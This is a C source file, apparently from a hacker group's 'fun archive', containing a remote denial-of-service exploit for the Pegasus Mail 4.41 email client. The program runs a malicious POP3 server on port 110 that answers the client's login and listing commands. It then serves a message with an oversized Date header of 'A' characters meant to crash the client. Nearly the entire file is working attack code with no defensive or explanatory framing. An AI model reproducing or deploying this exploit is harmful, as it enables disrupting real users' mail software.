/* KL0109FUN_constellation.c Krakow Labs [Fun Archive] -> www.krakowlabs.com/dev/fun Pegasus Mail 4.41 'Date' Remote DoS rush@KL KL0109FUN_constellation.c */ #include #include #include #include #include #include #include #define OK "+OK\r\n" #define SRESP "+OK 1\r\n" #define LRESP "+OK\r\n1 100\r\n.\r\n" #define BUFSZ 256 #define DATESZ 289 #define MSGSZ DATESZ+64 #define PORT 110 #define TRIGNUM 289 int main() { char buf[BUFSZ], date[DATESZ], msg[MSGSZ]; int cli, serv, i; struct sockaddr_in client, server; int clen = sizeof(client); server.sin_family = AF_INET; server.sin_port = htons(PORT); server.sin_addr.s_addr = INADDR_ANY; if((serv = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket()"); close(serv); return -1; } if(bind(serv, (struct sockaddr *)&server, sizeof(struct sockaddr)) < 0) { perror("bind()"); close(serv); return -1; } if(listen(serv, 5) < 0) { perror("listen()"); close(serv); return -1; } if((cli = accept(serv, (struct sockaddr *)&client, &clen)) < 0) { perror("accept()"); close(cli); close(serv); return -1; } if(getpeername(cli, (struct sockaddr *)&client, &clen) < 0) { perror("getpeername()"); close(cli); close(serv); return -1; } fflush(stdout); printf("%s\n", inet_ntoa(client.sin_addr)); // Pegasus Mail simply reads the banner then does USER, PASS, STAT, LIST, RETR, DELE, QUIT for(i = 1; i <= 3; i++) { send(cli, OK, strlen(OK), 0); recv(cli, buf, BUFSZ, 0); memset(buf, 0, BUFSZ); } send(cli, SRESP, strlen(SRESP), 0); recv(cli, buf, BUFSZ, 0); memset(buf, 0, BUFSZ); send(cli, LRESP, strlen(LRESP), 0); recv(cli, buf, BUFSZ, 0); memset(buf, 0, BUFSZ); memset(date, 'A', DATESZ); date[sizeof(date)-1] = '\0'; snprintf(msg, MSGSZ, "+OK\r\nDate: %s\r\nKL0109FUN_constellation.c\r\n.\r\n", date); send(cli, msg, strlen(msg), 0); recv(cli, buf, BUFSZ, 0); memset(buf, 0, BUFSZ); send(cli, OK, strlen(OK), 0); recv(cli, buf, BUFSZ, 0); send(cli, OK, strlen(OK), 0); close(cli); close(serv); return 0; }